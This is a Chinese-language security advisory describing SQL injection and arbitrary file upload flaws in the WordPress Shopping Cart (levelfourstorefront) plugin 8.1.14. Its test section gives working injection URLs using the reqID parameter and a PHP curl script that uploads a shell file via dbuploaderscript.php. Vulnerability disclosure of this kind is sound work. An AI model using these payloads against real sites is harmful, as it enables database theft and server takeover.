WordPress Shopping Cart插件多个SQL注入和任意文件上传漏洞

发布日期:2012-12-30
更新日期:2013-01-05

受影响系统:
WordPress Shopping Cart 8.1.14
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57101
 
WordPress Shopping Cart插件是购物车系统,具有电子交易功能和管理工具。

WordPress Shopping Cart插件内存在安全漏洞,没有正确验证wp-content/plugins/levelfourstorefront/scripts/administration/backup.php, wp-content/plugins/levelfourstorefront/scripts/administration/dbuploaderscript.php, wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php, wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php内的 "reqID" 参数值的合法性,可导致任意SQL代码执行和任意文件上传。
 
<*来源:Sammy Forgit
 
  链接:http://packetstormsecurity.com/files/119217/wplevelfour-sqlshell.txt
        http://www.securelist.com/en/advisories/51690
        http://www.opensyscom.fr/Actualites/wordpress-plugins-wordpress-shopping-cart-multiple-vulnerability.html
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
## Exploit SQL injection :
 
Database Wordpress :
 http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php?reqID=1' or 1='1
 
Account XLS :
 http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php?reqID=1' or 1='1
 
Subscriber XLS :
 http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php?reqID=1' or 1='1
 

## Exploit Arbitrary File Upload:
 
PostShell.php
 <?php
 
$uploadfile = "lo.php";
      $force = "http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/dbuploaderscript.php";
      $ch = curl_init("$force");
      curl_setopt($ch, CURLOPT_POST, true); 
      curl_setopt($ch, CURLOPT_POSTFIELDS,
                array('Filedata'=>"@$uploadfile",
            'reqID'=>"1'or 1='1"));
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
      curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
      $postResult = curl_exec( $ch );
      curl_close($ch);
     
 print "$postResult";
 
?>
 

Shell Access :
 http://localhost/wordpress/wp-content/plugins/levelfourstorefront/products/lo.php
 
lo.php
 <?php
 phpinfo();
 ?>
 
# Site : 1337day.com Inj3ct0r Exploit Database

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
WordPress
 ---------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://wordpress.org/extend/plugins/levelfourstorefront/

相关推荐